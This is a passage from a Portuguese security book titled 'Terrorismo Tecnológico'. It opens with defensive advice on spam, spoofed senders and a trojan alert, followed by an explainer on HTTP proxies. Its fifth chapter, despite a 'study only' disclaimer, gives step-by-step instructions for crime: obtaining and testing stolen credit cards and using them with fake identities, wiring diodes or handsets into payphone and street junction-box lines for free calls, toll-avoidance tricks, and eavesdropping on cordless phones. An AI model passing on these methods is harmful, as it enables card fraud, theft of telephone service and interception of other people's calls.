são aqueles e-mails que o pentelho de um amigo seu fica te
repassando, como piadas, mensagens, textos...

Há também sites que após um cadastro, ficam mandando


noticias, previsões de tempo, anúncios de compra e venda entre
Terrorismo Tecnológico 95
Aprenda Para Sobreviver

outros. Até parece interessante durante alguns dias, mas logo


você não vai mais ter interesse e só servirá para lotar sua caixa de
e-mails.

O problema é bem mais grave do que se pensa, já que junto ao


e-mail poderá vir um vírus ou um trojan. Uma vez aberto este e-
mail o computador estará infectado. Então, desde já, instale um
bom antivírus que proteja não só a máquina, mas que também
cheque todos os e-mails recebidos e enviados.

Para parar de receber as correspondências de Spam, você


pode bloquear os e-mails, estes podem ser a partir de
determinados conteúdos ou de um determinado usuário. Para
bloquear você pode utilizar uma opção no Outlook ou no software
que você utiliza para ver as suas correspondências (geralmente
todos softwares de e-mail possuem está função). Ou então pela
própria página prestadora de serviços de e-mail como o bol,
globo.com, Hotmail etc.

4.3 E-Mail Bomba

Às vezes até serviços de Spam são utilizados para este, o e-


mail bomba consiste no envio de muitos e-mails em um tempo
muito rápido, ou pode ser um e-mail que se reproduz, assim
quando o usuário o abrir ele se multiplicará, o sistema
provavelmente vai ficar superlotado e a máquina vai travar.

Não há muito que fazer neste caso a não ser usar o antivírus e
se a máquina travar reiniciá-la e após isso apagar este e-mail.

4.4 Remetente falso ou anônimo


Terrorismo Tecnológico 96
Aprenda Para Sobreviver

O serviço de SMTP3 não requer uma autenticidade, então


qualquer um pode mandar um e-mail dizendo que é qualquer
pessoa. Você pode mandar um e-mail dizendo que é o presidente
de alguma empresa, ou algum distribuidor, enfim pode se dizer
que é qualquer um.

Daí vem à necessidade de uma marca d´agua nos e-mails mais


importantes, ou uma assinatura eletrônica, para comprovar a
autenticidade dos e-mails, esses por sua vez muito frágeis a
falsificações.

4.5 E-mails com arquivos auto executáveis

Existem alguns programas como o MIME que faz que um


pequeno software se auto execute e instale no sistema, ele
funciona como alguns programas como algumas versões do
Outlook, que ao receber uma foto ele a abre automaticamente. Só
que este software pode ser um vírus ou um trojan.

Utilize antivírus e análise de onde vem cada e-mail.

4.6 Alerta

3
SMTP - é um protocolo destinado a fazer o envio das mensagens de e-mail. Ele se encarrega de
enviar as mensagens até o servidor. Ele não requer senhas por isso é tão fácil de falsificá-lo.
Terrorismo Tecnológico 97
Aprenda Para Sobreviver

O PROCON/SP E A ABRANET ALERTAM: CUIDADO COM


E-mails RECOMENDANDO INSTALAÇÃO DE "ARQUIVO DE
CORREÇÃO" DE SISTEMAS OPERACIONAIS

Diversos usuários da Internet têm recebido nos últimos dias,


uma mensagem que recomenda a instalação de um suposto
"pacote de correções" para os sistemas operacionais Windows XP,
2000 e NT.

O e-mail traz a identificação de remetente inexistente. Além


disso, a mensagem que recomenda a imediata instalação da
suposta "correção", por meio do download do aplicativo
"patch_2002.exe" passa a impressão de ser de autoria da
companhia fabricante daqueles sistemas operacionais, o que não
é verdade.

Caso você receba um e-mail com essas características, não


efetue o download do arquivo, pois se trata de "cavalo-de-tróia",
programa de computador que, uma vez executado, dentre outros
danos à sua máquina, pode capturar seus dados de acesso ao
banco pela Internet.

Como medida preventiva de segurança é recomendável evitar


abrir e-mail de origem desconhecida ou executar programas / abrir
arquivos anexados sem verificá-los com antivírus atualizado,
mesmo que o conteúdo seja criado pela pessoa de sua confiança
que os enviou. Eles podem conter vírus ou cavalos-de-tróia, sem
que os remetentes sequer saibam disso.

No caso específico de acesso ao seu banco via Internet, por


exemplo, certifique-se de estar navegando em site seguro, pela
existência de um pequeno cadeado fechado na parte inferior do
programa de navegação. Note também que no início do campo
"endereço” surge às letras "https".
Terrorismo Tecnológico 98
Aprenda Para Sobreviver

4.7 Dicas

Usem assinaturas eletrônicas para a autenticidade dos e-mails.

Utilize uma criptografia para o caso de alguém roubar


informações, assim apesar de telas não conseguirão saber o seu
conteúdo.

Troque de senha pelo menos a cada um mês.

Siga as recomendações se mudanças de senhas que estão no


capítulo referente a senhas.

Extra
(retirado da Internet)

Introdução
Os proxies são principalmente usados para permitir acesso à
Web através de um firewall (fig. 1). Um Proxy é um servidor HTTP
especial que tipicamente roda em uma máquina firewall. O Proxy
espera por uma requisição de dentro do firewall, a repassa para o
servidor remoto do outro lado do firewall, lê a resposta e envia de
volta ao cliente.
Terrorismo Tecnológico 99
Aprenda Para Sobreviver

Figura 1: Visão geral de um Proxy


O Proxy está rodando ou em um servidor firewall ou qualquer
outro servidor interno que tenha acesso total a Internet - ou em
uma máquina dentro do firewall fazendo conexões com o mundo
exterior através de SOCKS ou qualquer outro software firewall.

Normalmente, o mesmo Proxy é usado por todos os clientes


em uma sub-rede. Isto torna possível para ele fazer caching
eficiente de todos os documentos requisitados.

A habilidade que o Proxy tem no uso do cache, o torna atrativo


para aqueles que não estão dentro do firewall. Configurar um
servidor Proxy é fácil e os mais populares programas clientes Web
já tem suporte a essa ferramenta. Sendo assim, torna-se simples a
tarefa de configurar um grupo de trabalho inteiro para usar o
serviço de cache do Proxy. Isto reduz os custos com tráfego de
rede porque muitos documentos que são requisitados são lidos do
cache local.

A metodologia atual é baseada em um código de gateway


escrito por Tim Berners-Lee como parte do libwww (WWW
Terrorismo Tecnológico 100
Aprenda Para Sobreviver

commom Library). Kevin Altis, Ari Luotonen e Lou Montulli foram


os principais contribuidores para a padronização do Proxy. Lou
Montulli, autor de Lynx, fez as primeiras mudanças no libwww em
colaboração com Kevin Altis. Ari Luotonen mantém o CERN httpd.

Porque um nível de aplicação Proxy?

Um nível de aplicação Proxy faz um firewall seguramente


permeável para os usuários na organização sem criar um furo na
segurança onde hackers poderiam entrar na rede da organização.

Para clientes Web, as modificações necessárias para suportar


um nível de aplicação Proxy são menores (leva-se apenas 5
minutos para adicionar suporte Proxy para o Emacs Web
Browser).

Não há necessidade de compilar versões especiais de clientes


Web com bibliotecas firewall, o cliente "out-of-the-box" pode ser
configurado para ser um cliente Proxy. Em outras palavras,
quando se usa Proxy não necessitamos customizar cada cliente
para suportar um tipo ou método especial de firewall: o Proxy, em
si, é um método padrão para acessar firewalls.

Usuários não têm que ter clientes FTP, Gopher e WAIS


separados (muito menos modificados) para acessar um firewall -
um simples cliente Web com um servidor Proxy trata todos esse
casos. O Proxy também padroniza a aparência de clientes Gopher
e FTP.

O Proxy permite que os programadores esqueçam as dezenas


de milhares de linhas de código necessárias para suportar cada
protocolo e se concentrem em coisas mais importantes - é
possível ter clientes "peso-leve" que somente compreendam HTTP
(nenhum suporte nativo aos protocolos FTP, Gopher, etc) - outros
protocolos são manuseados transparentemente pelo Proxy.
Terrorismo Tecnológico 101
Aprenda Para Sobreviver

Usando HTTP entre o cliente e o Proxy, nenhuma funcionalidade é


perdida, pois FTP, Gopher e outros protocolos Web são bem
mapeados para o HTTP.

Clientes sem DNS (Domain Name Service) também podem


usar a Web. O endereço IP do Proxy é a única informação
realmente necessária. Organizações usando endereços, por
exemplo, classe A (como 10.*.*.*), em suas redes particulares
podem ainda acessar a Internet contanto que o Proxy seja visível
tanto para a rede particular como para a Internet.

Proxy permite um alto nível de log das transações de clientes,


incluindo endereço IP, data e hora, URL, contagem de bytes e
código de acesso. Qualquer campo (seja de meta-informação, ou
seja, comum) em uma transação HTTP é um candidato para log.
Isto não é possível com log no nível IP ou TCP.

Também é possível fazer a filtragem de transações de clientes


no nível do protocolo de aplicação. O Proxy pode controlar o
acesso a serviços por métodos individuais, servidores e domínios,
etc.
Outra feature interessante do Proxy é a cache. O uso de cache
é mais efetivo no servidor Proxy do que em cada cliente. Isto salva
espaço em disco, desde que somente uma cópia é guardada,
como também permite um uso de "cache inteligente", onde os
documentos freqüentemente referenciados por muitos clientes são
guardados por um período mais longo de tempo pelo cache
manager.

O uso de cache também torna possível acessar algumas


páginas mesmo que servidores estejam fora do ar. Essa facilidade
torna o serviço melhor, visto que recursos remotos como um site
FTP ocupado que são freqüentemente inacessíveis remotamente
podem ser agora acessíveis através do cache local. Pode-se citar
uma infinidade de usos que podemos fazer com o cache: fazer
uma demonstração de algum lugar com uma baixa velocidade de
Terrorismo Tecnológico 102
Aprenda Para Sobreviver

conexão, ler documentos com a máquina não-conectada


(obviamente após colocar todos documentos no cache local), etc.

Em geral, autores de clientes Web não têm razão para usar


versões de firewalls em seus códigos. O Proxy é mais simples
para configurar do que SOCKS e trabalha em todas as
plataformas, não somente UNIX.

Detalhes Técnicos

Quando uma requisição HTTP normal é feita por um cliente, o


servidor pega somente o path e a "porção chave" da URL
requisitada (Fig. 2); outras partes, como o especificador de
protocolo "http:" e o nome do servidor são obviamente claros para
o servidor HTTP remoto. O path requisitado especifica um
documento ou um script CGI no sistema de arquivos local do
servidor; ou ainda algum outro recurso disponível daquele
servidor.

Quando um usuário entra:

http://mycompany.com/information/ProxyDetails.html

O browser converte para:

GET /information/ProxyDetails.html
Terrorismo Tecnológico 103
Aprenda Para Sobreviver

Figura 2: Uma transação HTTP normal


O cliente faz a requisição ao servidor HTTP especificando
apenas o recurso relativo àquele servidor (nenhum protocolo ou
nome de servidor é colocado na URL).

Quando um cliente envia uma mensagem para um servidor


Proxy a situação é um pouco diferente. O cliente sempre usa
HTTP para transações com o Proxy, mesmo quando acessa um
recurso oferecido por um servidor remoto usando outro protocolo,
como Gopher e FTP.

Entretanto, ao invés de especificar somente o pathname e


possíveis palavras que complementariam a procura para o Proxy
(como ocorre em uma requisição normal), todo a URL é
especificada (fig.3 e 4). Desta forma o Proxy tem todas as
informações necessárias para fazer a requisição para o servidor
remoto especificado na URL.

Nada melhor que um exemplo para clarear as coisas: se o


usuário digitasse a seguinte URL:

http://mycompany.com/information/ProxyDetails.html

O browser, sabendo da existência do Proxy, convertería para a


seguinte requisição:
Terrorismo Tecnológico 104
Aprenda Para Sobreviver

GET http://mycompany.com/information/ProxyDetails.html

O browser conecta-se então ao servidor e o Proxy providencia


a conexão com a Internet. Nesse caso, o Proxy convertería a
requisição para:

GET /information/ProxyDetails.html

Figura 3: Uma transação HTTP com Proxy.


O cliente faz uma requisição ao Proxy usando HTTP mas
especificando toda a URL; o Proxy se conecta ao servidor remoto
e pede o recurso relativo àquele servidor sem especificar protocolo
ou o nome do servidor na URL
Terrorismo Tecnológico 105
Aprenda Para Sobreviver

Figura 4: Transação FTP com Proxy.


O cliente faz a requisição ao Proxy usando HTTP (embora o
recurso seja um FTP). O Proxy analisa a URL recebida e percebe
que deve abrir uma conexão FTP. O resultado (o arquivo, no caso)
é enviado para o cliente usando HTTP

Deste ponto o Proxy age como um cliente para conseguir o


documento: ele chama o mesmo protocolo libwww que um cliente
deveria chamar para que o documento fosse obtido. Entretanto, a
"apresentação" do documento no Proxy é através de HTTP,
independente do protocolo que foi usado para consegui-lo. Um
comando list, por exemplo, é retornado como um documento
HTML.
Terrorismo Tecnológico 106
Aprenda Para Sobreviver

Capítulo V

- Carders e Phreackers

Os textos a seguir foram obtidos pela web. São


exclusivamente para entender a facilidade de ser
um carder ou um phreacker. Qualquer utilização do material para outro
fim que não seja um estudo cientifico não será de responsabilidade do
autor. A utilizaçao do material como manual para uso é considerado
crime.
Use o somente para estudos.
Terrorismo Tecnológico 107
Aprenda Para Sobreviver

O carder

5.1 Como Funciona:

Os cartões de crédito são totalmente verdadeiros. Veja bem. Você


vai a um restaurante e paga com seu cartão. Certo ? Bem, logo
seus dados são enviados a agenciadora do seu cartão, via modem,
pela aquela maquininha, ou por telefone. Depois que seu cartão fora
debitado na agenciadora. ai entram os Carders. Eles invadem o
sistema, pegam todos os arquivos de cc (credit card). e distribuem
no IRC ( International Relay Chat) para tornar, então, mais dificil
achar os Crakers que pegam os cartões. Uma vez distribuídas no
IRC às informações obtidas sem autorização (invasão) sobre os
cartões. são passadas para os Carders, por sistema de troca,
geralmente uma conta Shell (conta especial em Linux ou Unix).
Cada usuário carder vai usar o cartão em um ponto diferente do
mundo.

5.2 Obtenção de cartões.

Como você sabe nenhuma transação é segura na WEB. Quando se


faz compras on line, as páginas oferecem a opção de compra pelo
SECURE SERVER, isto é, eles garantem que transação está sendo
feita somente entre a sua máquina e a do servidor, pois todos os
dados estão sendo codificados. Isso não garante nada!.
Terrorismo Tecnológico 108
Aprenda Para Sobreviver

Mesmo que nenhum hacker consiga decodificá-la, isso não impede


que se entre no servidor da página e consiga o arquivo que
contenha os dados dos clientes.

A outra opção menos trabalhosa, é simplesmente PEDIR!!!

É simples: no IRC, existem canais específicos, são os canais


hackers, é só fazer amizade e pedir o número de um cartão.

Existem canais no IRC específicos falando sobre carders, #carders -


#cc - #carding - #mastercard - #passw. A EFNET é mais visada,
tendo russos, americanos, brasileiros, e tudo mais : ) visite:
http://www.klan.carder.com . #carder Brasnet - #cader Efenet -
#carder Brasirc

5.3 Como Cardear!

Antes de tudo você deve testar os cartões. Existem páginas de


compras, ou na maioria delas, paginas de registro de shareware que
você deve preencher o cadastro* como se fosse registrar um soft
seu e nisso ela dirá se o cartão é válido ou não.

*O Cadastro.
Terrorismo Tecnológico 109
Aprenda Para Sobreviver

Quando você for se cadastrar, você deve preencher todos os


campos com informações falsas, ou seja, o endereço..tel..etc, pois
você não quer ver o sol nascer quadrado né??. A única informação
que deve ser verdadeira é o e-mail* pra contato.

*O E-mail.

O e-mail também não deve ser o do seu do provedor, você deve


usar o e-mail de páginas que fornecem o e-mail gratuito tipo:
Hotmail , Starmedia etc.

Rastreamento de IP.

Quando você prenche os dados em páginas de cadastrador, seu


endereço IP é rastreado pela página, ou seja, eles podem te
localizar pelo seu provedor de acesso mas pode ser usado técnicas
de anonimidade.

O que geralmente é cardeado.

Suas habilidades carders podem ser usadas de diversas maneiras:


Terrorismo Tecnológico 110
Aprenda Para Sobreviver

Você pode fazer inscrição em home pages que dão acesso


exclusivo para usuários, na maioria páginas pornos, onde o acesso
ao conteúdo só é permitido com o pagamento mediante cartão de
Crédito. LEMBRE-SE: As informações do cadastro devem ser
falsificadas, menos o cartão, é claro.

5.4 Como cardear algo concreto

Sem dúvida a glória de um Carder é cardear alguma coisa, de


preferência um computador para conseguir tais proezas é
necessário:

1- Você tem que estar certo que o cartão é válido!!!!!

2- Use de preferência cartão estrangeiro, evite cartões brasileiros.

(3- Se você for cardear alguma coisa cara, use cartões American
Express e Visa Gold, pois o limite e grande e não há perigo de não
ter crédito :-)

4- Não cometa o erro de cardear alguma coisa cara parcelado, ou


seja, compre tudo à vista!!!

5- Se você for cardear assinaturas de revistas (registramos casos


desse tipo também), não assine revistas nacionais, cardeie as
americanas, levam +ou- uns 20 dias para chegar. Uma dica
Importante:

Se você puder alugue uma caixa postal nos correios, para receber
essas revistas ( custa R$ 54,18 por 1 ano).
Terrorismo Tecnológico 111
Aprenda Para Sobreviver

Pronto você já pode se divertir como um CARDER !!!!!!!

5.5 Phreacker (Telefonia)

Indice

A1. Introdução
A1.1. Prefacio da versão
A1.2. Pobreza de informações e pessoas mal informadas
A2. Telefones privados
A2.1. Introdução
A2.2. Efetuando ligações de aparelhos sem teclas
A3. Telefones públicos
A3.1. Introdução
A3.2. Efetuando ligações gratuitamente utilizando um diodo
A3.3. Efetuando ligações gratuitamente utilizando um aparelho
comum
A3.4. Conectando notebooks a telefones públicos
A3.5. Observação
A4. Caixas de verificação
A4.1. Introdução
A4.2. Efetuando ligações gratuitas de caixas de verificação
A5. FAQ
A5.1. E possível tomar um choque mexendo em fios telefônicos?
A5.2. Como faço para fazer chamadas grátis de minha residência?
A6. Observação final
Terrorismo Tecnológico 112
Aprenda Para Sobreviver

A1. Introdução

A1.1. Prefacio da versão

Depois da primeira versão deste manual recebi dezenas de


mensagens, principalmente do pessoal do BHC (Brazilian Hackers
Club), com varias perguntas. Algumas se tornaram adendos e
complemento para as seções e outras eu levei para uma Mini-FAQ,
que esta localizada na seção 5.

A1.2. Pobreza de informações e pessoas mal


informadas

Ao me deparar com alguns textos do gênero, senti-me


decepcionado ao perceber que eram incompletos e fracos, quando o
assunto em questão era a telefonia. E triste também perceber que
pessoas mal informadas e sem conhecimento técnico (embora
tenham boa vontade), assinam estes textos. Faço aqui um tutorial
com material bastante útil, que explica muitas coisas que podem ser
feitas com a intenção de buscar um pouco de liberdade para se
utilizar os sistemas telefônicos. Este texto também e destinado
aqueles que se rasgam de ler textos americanos de phreaking e
boxing. Não importa o que o fulano ouviu dizer que dava, o sistema
telefônico nacional e completamente diferente do usado nos EUA, e
não permite o "boxing". Maiores detalhes na seção 5.
Terrorismo Tecnológico 113
Aprenda Para Sobreviver

A2. Telefones privados

A2.1. Introdução

Nesta seção, explicarei o processo (bem simples) de se efetuar


ligações a partir de telefones sem teclas ou com cadeado, muito
comuns em empresas e ambientes de trabalho.

A2.2. Efetuando ligações de aparelhos sem teclas

Antes de começarmos, precisamos definir o que significa "duração


de um pulso". Um pulso e simplesmente uma interrupção no fluxo
de corrente que circula na linha telefônica, e a sua duração e
entendida como o espaço de tempo decorrido do inicio ao fim desta
interrupção. Os pulsos enviados pelo aparelho telefônico quando
você aperta o botão de algum número, são iguais ao sinal emitido
quando você coloca o telefone no gancho. A diferenciação e feita
pela central telefônica, usando como referencia a duração do pulso.
Se ele for um pouco maior do que 0.5 segundos (aumentar um
pouco esse valor para as linhas mais antigas), a central considera
que e um pedido de linha. Se a duração do pulso for menor do que
esse valor, a central ira considerar que o número a ser discado esta
sendo enviado. Para formar os números de 0 a 9, e enviada uma
série de pequenos pulsos em seqüência referentes ao número, ou
seja, dois pulsos para o número 2, três para o número 3 e assim por
diante. Para o número zero são enviados dez pulsos. Para simular
esses pulsos sem a necessidade de teclas, basta usar o botão onde
se "pega" a linha, aquele onde você coloca o telefone em cima
quando quer terminar uma ligação. Aperte e solte este botão
rapidamente de acordo com o número que você quer discar, espere
um pouco e aperte outra série de vezes de acordo com o outro
número. Lembre-se que para o número zero deve-se apertar o
botão dez vezes. Faça isso com todos os números e, ao final, você
escutara o tom de chamada.
Terrorismo Tecnológico 114
Aprenda Para Sobreviver

A3. Telefones publicos

A3.1. Introdução

Nesta seção explicaremos alguns métodos que hackers usam para


efetuar ligações com telefones públicos sem a necessidade de se
gastar fichas. Mostraremos também como ligar notebooks a
telefones públicos (se e que existe um hacker que não saiba).

A3.2. Efetuando ligações gratuitamente utilizando um


diodo

O diodo e um componente eletrônico que possui diversas


utilizações. Podemos resumir seu funcionamento basicamente na
seguinte síntese: Um diodo (ou junção PN) permite que a corrente
circule em apenas uma direção dentro de um circuito. Ao se utilizá-
lo para o fim aqui desejado, vamos precisar de um diodo IN4002,
IN4004 ou IN4007. Estes podem ser encontrados facilmente em
qualquer casa de componentes eletrônicos. Vamos precisar também
de um resistor com valor nominal de 22K e potencia de 1W. Basta
que você ligue o diodo em paralelo com o resistor (conforme tenta
mostrar a ilustração abaixo) e, em seguida, descasque os fios do
telefone e ligue cada uma das pontas obtidas com o diodo e o
resistor neles. Lembre-se: você vai apenas descascar os fios do
orelhão! Se você cortá-los, ele vai ficar sem linha.

||
||
||
||
+------------------++------------------+
||
||
| +----¦ ¦ ¦ ¦ ¦ ¦ ¦----+ |
">| / diodo \ |
Terrorismo Tecnológico 115
Aprenda Para Sobreviver

ponta +_-----------+ +-----------_+ ponta


|\/|
| +-----¦ ¦ ¦ ¦ ¦ ¦ ¦-----+ |
| resistor |
||
+------------------++------------------+
||
| | fio do telefone
||
||

Para executar esta tarefa, eu aconselho que você descasque os fios


dos orelhões que você utiliza com mais freqüência, pois, devido ao
fato dos fios do telefone publico serem muito grossos, não e um
trabalho que se possa fazer tranqüilamente e rapidamente sem ser
notado. Você devera observar também a polarização correta a ser
utilizada. Você percebera isso facilmente, pois, quando você ligar o
diodo de maneira errada, o orelhão vai ficar sem linha. Uma dica
pessoal: os telefones de cabine e os de cartão são mais fáceis de
serem violados. Alguns orelhões comuns tem uma proteção
blindada que impede o acesso ao cabo telefônico. Embora mesmo
assim seja possível puxar o fio com um gancho, que você enfiara do
lado esquerdo do aparelho telefônico, entre o telefone e uma grade
preta de sustentação que fica atrás dele, eu aconselho que você
evite esses tipos. Vamos voltar um pouco para a parte técnica da
coisa. O diodo que estamos utilizando vai funcionar da seguinte
maneira: Quando uma ligação e completada de um telefone publico,
a central inverte a polarização do telefone de -48 para 48 volts.
Quando o aparelho telefônico percebe isso, ele pede uma fixa. E ai
que entra em funcionamento o nosso querido diodo. Ele permite que
a tensão caia ate 0 volts, mas não permite que ela se torne positiva.
Dessa forma, o orelhão não vai pedir a ficha. Nesse caso o resistor
esta funcionando apenas como um dissipador de potencia, para que
você não de o azar de queimar o diodo (não que ele seja caro, e
que em algumas localidades ele pode ser uma peça rara que custa
R$0,10) e ficar sem telefonar. Mesmo se você não achar nenhuma
Terrorismo Tecnológico 116
Aprenda Para Sobreviver

loja que venda, pegue uma placa de algum circuito eletrônico antigo
de alguma coisa que tenha queimado. Elas sempre tem diodos.
Você deve procurar uma peça pequenininha que tem dois terminais,
e preta e normalmente estará escrito IN qualquer coisa.

A3.3. Efetuando ligações gratuitamente utilizando um


aparelho comum

Primeiro você deve tomar os processos citados anteriormente para


descascar os fios do telefone. Em seguida você deve conseguir um
aparelho telefônico comum e ligar cada uma das pontas dos fios
dele nos fios do orelhão. Para facilitar sua vida, eu aconselho que o
seu telefone seja o menor possível e que você prenda um jacaré
(pequeno gancho achado em qualquer loja de componentes
eletrônicos) em cada uma das pontas do seu telefone, para facilitar
a ligação no orelhão. Ai e só efetuar a ligação normalmente.

A3.4. Conectando notebooks a telefones públicos

O processo para se conectar notebooks a orelhões e igual ao de se


conectar telefones comuns. Resumirei nesse item algumas
considerações a respeito da fiação do notebook, que segue os
padrões da FCC Americana e é um pouco diferente da nossa. O
conector do fio do notebook, que e do tipo Jack, tem quatro fios
dentro dele. Arranque o conector de plástico transparente que fica
na ponta do fio, pegue os dois fios centrais e separe-os dos fios das
extremidades. Estes dois fios centrais são os que serão utilizados
para fazer a ligação no orelhão. Eu aconselho que você coloque
jacarés neles também. Basta conectar-se a BBS's da mesma forma
que você se conecta em casa. Caso você queira testar se esta tudo
OK, abra um programa de terminal qualquer e digite o comando
ATA, se fizer um barulhinho parecido com o tom de linha e porque
esta tudo OK.
Terrorismo Tecnológico 117
Aprenda Para Sobreviver

A3.5. Observação

As chamadas telefônicas se dividem em três categorias: locais, DDD


regionais e interurbanas (ou nacionais). As chamadas locais são
aquelas efetuadas dentro de sua cidade, as DDD regionais são as
ligações feitas dentro do complexo urbano onde você mora, no caso
de São Paulo, as chamadas DDD regionais são aquelas feitas para
as cidades que fazem parte da Grande São Paulo: Jundiaí, Santo
André, São Bernardo, etc. As chamadas interurbanas são aquelas
feitas para fora do complexo urbano onde você esta localizado.
Usando São Paulo como exemplo, podemos citar o interior do
estado de São Paulo e cidades localizadas em outros estados. Os
telefones comuns efetuam chamadas locais e DDD regionais, e os
telefones DDD efetuam chamadas interurbanas, ou seja, para
qualquer lugar do Brasil.

A4. Caixas de verificação

A4.1. Introdução

As caixas de verificação (ou armários na linguagem "técnica" da


TELESP) são caixas de ferro, que geralmente ficam localizadas em
vias publicas, e são utilizadas para se fazer a checagem das linhas
do sistema e identificar problemas antes de se enfiar no subsolo
para tentar resolvê-los. Tais caixas costumam ser da cor cinza e tem
cerca de 1,5 m de altura, com um código em preto escrito na parte
superior. Elas possuem um grande número de fios telefônicos, todos
eles divididos em pares. Tais caixas podem ser facilmente abertas
(se e que a que você achar já não estiver arrombada), pois
geralmente possuem uma tranca padrão em forma de triangulo, que
qualquer chaveiro conhecido pode fazer. Lembre-se que um
phreacker, não é um vândalo. Não vá arrombar a porra da caixa.
Terrorismo Tecnológico 118
Aprenda Para Sobreviver

Isto e coisa pra quem não tem cérebro. Mesmo se ela estiver
trancada com um cadeado, se não puder abrir um cadeado ou
procurar informação de um método para abri-lo, procure outra caixa.
Ou então esqueça que você leu esta seção.

A4.2. Efetuando ligações gratuitas de caixas de


verificação

Para se efetuar uma ligação de dentro destas caixas, basta que


você pegue um dos diversos pares de fios que se encontram lá
dentro e ligue eles ao seu pequeno telefone comum portátil ou a um
notebook. Não esqueça de por os fios que você tirou de volta no
lugar para que nem o pessoal da manutenção e nem o dono da
linha percebam. Como essas caixas de verificação costumam se
situar em vias bem movimentadas, a pratica desse tipo de ligação e
desaconselhada. Mas, como toda a regra tem sua exceção, fica aqui
mais uma informação para você. Vale lembrar que de caixas de
verificação pode-se efetuar telefonemas para qualquer lugar,
inclusive chamadas internacionais.

A5. FAQ

A5.1. E possível tomar um choque mexendo em fios


telefônicos?

Como descrito no item 1.3, os fios telefônicos possuem uma tensão


suficiente para dar choque relativamente forte em uma pessoa. Este
valor de tensão pode atingir um patamar em que ele pode dar um
verdadeiro coice na pessoa, no momento em que a linha envia o
sinal para o telefone tocar. Isto depende muito da situação e da
pessoa. Se você estiver com a mão no orelhão e mexer nos fios,
você provavelmente vai tomar um choque legal. Se você estiver
Terrorismo Tecnológico 119
Aprenda Para Sobreviver

acabado de comer algo salgado, provavelmente este choque será


ainda mais forte, pois o sal aumenta a condutividade do seu corpo.

A5.2. Como faço para fazer chamadas grátis de minha


residência?

Quando você efetua uma chamada, a central telefônica identifica de


onde você esta discando, identifica qual o tipo de telefone que você
esta usando (publico ou residencial), e então ela arquiva pra onde
esta sendo feita a ligação e toma as providencias necessárias com
relação à cobrança. Essa identificação e feita na fonte e não por um
sinal enviado pelo seu telefone. Desse modo, e praticamente
impossível pra você que esta na sua residência, tentar driblar essa
tarifarão. Imagine que sua linha telefônica não passa de um ramal
de PABX.

A6. Observação Final

Todo o processo aqui descrito não causa nenhum tipo de dano aos
aparelhos telefônicos, mesmo em longo prazo.

5.6 Telefones Particulares


Terrorismo Tecnológico 120
Aprenda Para Sobreviver

Índice

B1. Como escutar ligações com um aparelho de radio comum


B2. Fraudando orelhões com um aparelho comum
B3. Como ligar para o Disk-Amizade sem pagar
B4. Ligando a cobrar mais barato
B5. Escutando conversas telefônicas através de telefone sem fio
B6. Efetuando ligações de telefones sem teclas

B1. Como escutar ligações com um aparelho de radio


comum

Para começar, entenda que isso e apenas o seu entretenimento.


Por isso, não daremos dicas de como escutar ligações telefônicas
do seu vizinho. Se o que você quer e isso, nem comece a ler. O que
será ensinado e escutar uma ligação dentro da sua casa. Os
telefones em questão são telefones sem fio. Eles transmitem suas
ondas por FM. Sendo assim, o que você tem que fazer e descobrir a
freqüência. Porém, ha suas restrições. A menos que seja um radio
com uma antena muito forte, ele tem que ficar perto da base do
telefone. Uma freqüência que descobri e 93,9 MHz, mas não quer
dizer que todas sejam assim. E não e apenas ligar o radio e escutar.
Leva-se um tempinho para poder sintonizar. Mas depois de
sintonizada no ponto exato, você poderá escutar perfeitamente.

B2. Fraudando orelhões com um aparelho comum

Modo de fraude com telefone comum a orelhões públicos: Primeiro


você deve arrumar um telefone comum bem pequeno e compacto.
Terrorismo Tecnológico 121
Aprenda Para Sobreviver

Depois você tem que descascar os fios dele (vão dar em 2 fios).
Então arrume um bom alicate, estilete ou faca e vá ate um orelhão.
Descasque os fios do orelhão (descasque, não e para cortar) pegue
os dois fios descascados do orelhão e entrelace com os dois fios do
seu telefone, observe a polarização, ou seja, se seu telefone portátil
ficar sem linha inverta a posição dos fios telefônicos, pois, ao
contrario do que muita gente pensa, o orelhão tem fio negativo e
positivo. Agora e só efetuar a ligação de seu telefone comum.

B3. Como ligar para o Disk-Amizade sem pagar

Pessoas de São Paulo tem acesso ao Disk-Amizade, o único


problema e que e pago, para ligar de graça apenas disque um 5 a
mais, que ficara 1455, desse modo sua ligação não cairá na lista
telefônica.

B4. Ligando a cobrar mais barato

Para ligar a cobrar mais barato, você tem que adicionar um número
que a soma dele com o ultimo seja igual a 10. Ex: A soma desses
números tem que dar 10. Como fazer: 9 011 5584-0352 + 8 = 9 011
5584-03528.

B5. Escutando conversas telefônicas através de


telefone sem fio

1° passo - Para que isso aconteça, você tem que tirar o


"transformador" (não sei se e esse o nome), e um retângulo que
normalmente e preto, igual ao de um vídeo game.
2º passo - Ligar o telefone! Ele tem que ficar fazendo uns barulhos
estranhos!
Terrorismo Tecnológico 122
Aprenda Para Sobreviver

3º passo - Pegar ele e sintonizá-lo no melhor lugar de sua casa.


ps: Isso só funciona algumas vezes! Lembre-se que não sou
responsável pelos seus atos!

B6. Efetuando ligações de telefones sem teclas

Antes de começarmos, precisamos definir o que significa "duração


de um pulso". Um pulso e simplesmente uma interrupção no fluxo
de corrente que circula na linha telefônica, e a sua duração e
entendida como o espaço de tempo decorrido do inicio ao fim desta
interrupção.

Os pulsos enviados pelo aparelho telefônico quando você aperta o


botão de algum número, são iguais ao sinal emitido quando você
coloca o telefone no gancho. A diferenciação e feita pela central
telefônica, usando como referencia a duração do pulso. Se ele for
um pouco maior do que 0.5 segundos (aumentar um pouco esse
valor para as linhas mais antigas), a central considera que e um
pedido de linha. Se a duração do pulso for menor do que esse valor,
a central ira considerar que um número a ser discado esta sendo
enviado.

Para formar os números de 0 a 9, são enviados uma série de


pequenos pulsos em seqüência referentes ao número, ou seja, dois
pulsos para o número 2, três para o número 3 e assim por diante.
Para o número zero são enviados dez pulsos.

Para simular esses pulsos sem a necessidade de teclas, basta usar


o botão onde se "pega" a linha, aquele onde você coloca o telefone
em cima quando quer terminar uma ligação. Aperte e solte este
botão rapidamente de acordo com o número que você quer discar,
espere um pouco e aperte outra série de vezes de acordo com o
outro número. Lembre-se que para o número zero deve-se apertar o
botão dez vezes. Faça isso com todos os números e, ao final, você
escutara o tom de chamada.
Terrorismo Tecnológico 123
Aprenda Para Sobreviver

5.7 Telefones Celulares

Índice

C1. Burlando celulares


C2. Ouvindo escuta de celulares
C3. Fazendo escutas com o PT 550 da Motorola
C4. Escuta celular via TV
C5. Escuta celular

C1. Burlando celulares

Primeiro, pegue o número que você vai discar. Ex: 123-4567. Esse
número e fictício, não saia ligando para lá para pedir informações.
